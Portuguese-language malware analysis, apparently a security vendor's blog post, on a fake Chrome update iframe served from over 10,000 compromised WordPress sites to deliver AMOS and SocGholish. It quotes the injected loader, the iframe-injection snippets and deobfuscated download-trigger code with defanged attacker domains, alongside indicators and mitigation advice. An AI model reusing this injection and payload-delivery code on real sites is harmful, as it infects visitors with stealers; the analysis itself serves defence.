TL;DR: iframe falso de atualização do Chrome a distribuir malware multiplataforma
- Ambos os payloads, um iframe: A regra antiga era AMOS no Mac, SocGholish no Windows, provenientes de duas equipas distintas. Esta campanha acabou com essa regra e distribuiu ambos a partir do mesmo iframe falso de atualização do Chrome, nos mesmos 10.000 sites WordPress.
- Ignorado pelos feeds de ameaças: O loader alojado em deski.fastcloudcdn[.]com foi sinalizado em 17 de 96 no VirusTotal, e 27 domínios associados foram ligados a esta operação. O cside sinalizou o JS ofuscado inicial com alta confiança antes mesmo de o iframe ser renderizado.
- O que fazer agora: Se utiliza o WordPress 6.7.1 ou um plugin sem correção, parta do princípio de que já carrega um script que nenhum feed de ameaças deteta. Adicione inspeção de scripts em tempo de execução esta semana ou descubra o comprometimento na próxima vez que um visitante telefonar a reportar o problema.
Sem tempo? Veja o bloqueio in-browser de Magecart e skimmers da cside. Cobre tudo o que se segue numa única implementação.
Esta semana identificámos mais de 10.000 sites WordPress a exibir páginas falsas de atualização do navegador Google no navegador dos visitantes através de um iframe.
A página distribui malware multiplataforma: tanto o AMOS (Atomic macOS Stealer), que visa utilizadores Apple, como o SocGholish, que visa utilizadores Windows.

Estes são malwares populares e disponíveis comercialmente, que já circulam há algum tempo. As duas variantes de malware são normalmente atribuídas a grupos distintos de atacantes, uma divisão que esta descoberta contradiz.
Tanto quanto sabemos, é também a primeira vez que são distribuídos através de um ataque client-side. O JavaScript carregado no navegador do utilizador gera a página falsa dentro de um iframe. Os atacantes utilizam versões desatualizadas do WordPress e de plugins para dificultar a deteção em sites sem uma ferramenta de monitorização client-side instalada.
Os atacantes utilizaram provavelmente uma vulnerabilidade num plugin do WordPress para distribuir o JavaScript malicioso. Este ficheiro não é atualmente sinalizado por nenhum fornecedor de feed de ameaças, assim como o domínio também não é.


Aqui estão dois dos maiores domínios identificados em milhares de sites:
Detalhes técnicos
Utilizando o nosso motor de deteção, encontrámos um ficheiro JS suspeito de terceiros no seguinte URL:
https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de[.]js
A nossa plataforma sinalizou este ficheiro como um script malicioso com alta confiança, devido à sua natureza altamente ofuscada, que utilizava múltiplos níveis de codificação. Isto motivou uma análise mais aprofundada, levando-nos a descobrir uma rede com mais de 10.000 sites WordPress infetados.
Está disponível um exemplo de site comprometido no nosso diretório de domínios.

O blackshelter[.]org redireciona o utilizador para fastcloudcdn[.]com, que aloja o JavaScript malicioso.
![JavaScript malicioso alojado em fastcloudcdn[.]com que distribui o malware](/content/images/2025/08/10-000-WordPress-Websites-Found-Delivering-MacOS-and-Windows-Malware_5.png)
De seguida, identificámos vários scripts maliciosos alojados em domínios diferentes.
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" src="https://blacksaltys[.]com/2xIsQSDP8CyeXrv78zk9FGV8lZIj9SXKVc-Mpx3O5H0" id="ms_main_script-js" defer></script>
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" src="https://objmapper[.]com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e" id="ucf_main_script-js" defer></script>
Vários sites contêm **** elementos concebidos para fazer prefetch de DNS para domínios maliciosos, provavelmente para melhorar o desempenho das suas operações:
<link rel='dns-prefetch' href='//rednosehorse[.]com' />
<link rel='dns-prefetch' href='//blacksaltys[.]com' />
<link rel='dns-prefetch' href='//objmapper[.]com' />
<link rel='dns-prefetch' href='//blackshelter[.]org' />
Uma função anónima autoinvocada carrega dinamicamente um ficheiro JavaScript externo:
;(function(o, q, f, e, w, j) {
w = q.createElement(f);
j = q.getElementsByTagName(f)[0];
w.async = 1;
w.src = e;
j.parentNode.insertBefore(w, j);
})(window, document, 'script', `https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=${Math.floor(Date.now() / 1000)}`);
O script externo é carregado e executado dinamicamente, com um parâmetro de consulta (qbsfsc) contendo um timestamp Unix para contornar os mecanismos de cache.
Comportamento malicioso observado
O script ofuscado executa várias ações.
Primeiro, interrompe toda a atividade em curso no navegador.
window.stop();
Remove atributos como class, style, id, … entre outros, dos elementos HTML.
for (let at of [["class", "style", "lang", "id", "dir"]]) {
el.removeAttribute(at);}
Depois, injeta o iframe na página dinamicamente, exibindo a falsa página de atualização do Chrome.
let frame = document.createElement("iframe");
frame.srcdoc = rsd;
document.body.appendChild(frame);
Análise e descobertas
A nossa análise revelou que os sites comprometidos estavam a executar versões desatualizadas do WordPress (6.7.1) e dos respetivos plugins, que os atacantes poderão ter explorado para injetar código malicioso.
Identificámos 27 domínios maliciosos ligados a esta atividade.
Alguns exemplos incluem:
- blacksaltys[.]com
- objmapper[.]com
- rednosehorse[.]com
- Blackshelter[.]org
O script malicioso em https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de[.]js apresentou uma taxa de deteção de 17/96 no Relatório do VirusTotal.
Durante a nossa análise, verificámos que esta campanha visa tanto plataformas Windows como macOS. Conseguimos transferir com sucesso um ficheiro dmg associado ao malware para macOS.
Malware para MacOS e Windows descodificado
O ficheiro de malware (274efb6bb2f95deb7c7f8192919bf690d69c3f3a441c81fe2a24284d5f274973), no momento da análise, foi sinalizado por 6 fornecedores de antivírus.
O código seguinte foi descoberto após múltiplas camadas de desofuscação. Cria e transfere dinamicamente o ficheiro de malware AMOS (Atomic Mac OS Stealer) para macOS.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
</head>
<body>
<script>
(async () => {
try {
var btn = document.createElement("a");
btn.href = `hxxps://extendedstaybrunswick[.]com/wp-content/plugins/reset-wp/resty.php?eg=${Math.floor(Date.now() / 1000)}`;
btn.download = "C_6.12.4.dmg";
document.body.appendChild(btn);
parent.postMessage("loaded", "*");
window.addEventListener("message", function (event) {
if (event.data == "download") {
setTimeout(function () {
btn.click();
}, 100);
}
});
} catch (e) { }
})()
</script>
</body>
</html>
O script gera dinamicamente um botão de transferência associado ao payload do malware para macOS. Este aguarda um evento "message" com o valor "download", que desencadeia a transferência do ficheiro.
Aqui estão duas fontes para saber mais sobre o malware AMOS.
Aqui está uma fonte para saber mais sobre o malware SocGholish para Windows.
Tanto o AMOS como o SocGholish são malware disponível comercialmente e podem ser adquiridos no Telegram.
Mitigação e proteção
Como primeiro passo, atualize a sua instalação do WordPress. Atualize os seus plugins, avalie a sua utilização e remova os que não estão a ser usados. Procure os scripts e, se os encontrar, elimine-os. Na maioria das vezes, os atacantes deixam uma backdoor. Encontre-a e remova-a.
Se encontrar estes scripts no seu site, recomendamos vivamente rever os registos dos últimos 90 dias para identificar quaisquer indicadores de comprometimento ou atividade maliciosa.
Se transferiu algum ficheiro dos sites afetados, recomenda-se uma limpeza completa do sistema para mitigar uma possível infeção por malware.
O cside consegue detetar, alertar e bloquear ataques client-side como estes graças ao nosso avançado motor de deteção e proxy. Este ataque teria sido detetado e bloqueado com o cside instalado, protegendo utilizadores desprevenidos da transferência do malware.
Este ataque é um lembrete para proteger a cadeia de fornecimento web e manter o software atualizado. Com base na nossa análise, recomendamos o seguinte:
Pode começar gratuitamente ou contactar-nos.
Lista completa de sites infetados
Encontre ligações seguras para as páginas do PublicWWW dos domínios infetados:









